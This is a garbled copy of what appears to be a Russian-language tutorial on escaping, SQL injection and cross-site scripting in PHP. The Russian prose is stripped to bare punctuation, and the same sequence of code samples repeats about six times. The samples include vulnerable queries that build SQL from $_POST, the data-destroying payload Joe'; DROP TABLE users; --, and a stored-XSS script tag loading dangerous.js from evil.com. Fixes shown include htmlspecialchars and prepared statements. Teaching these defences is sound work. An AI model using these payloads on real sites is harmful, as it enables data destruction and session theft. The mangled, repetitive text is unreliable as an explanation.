Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).? , - ? XML - . . . , - , i .
, - .
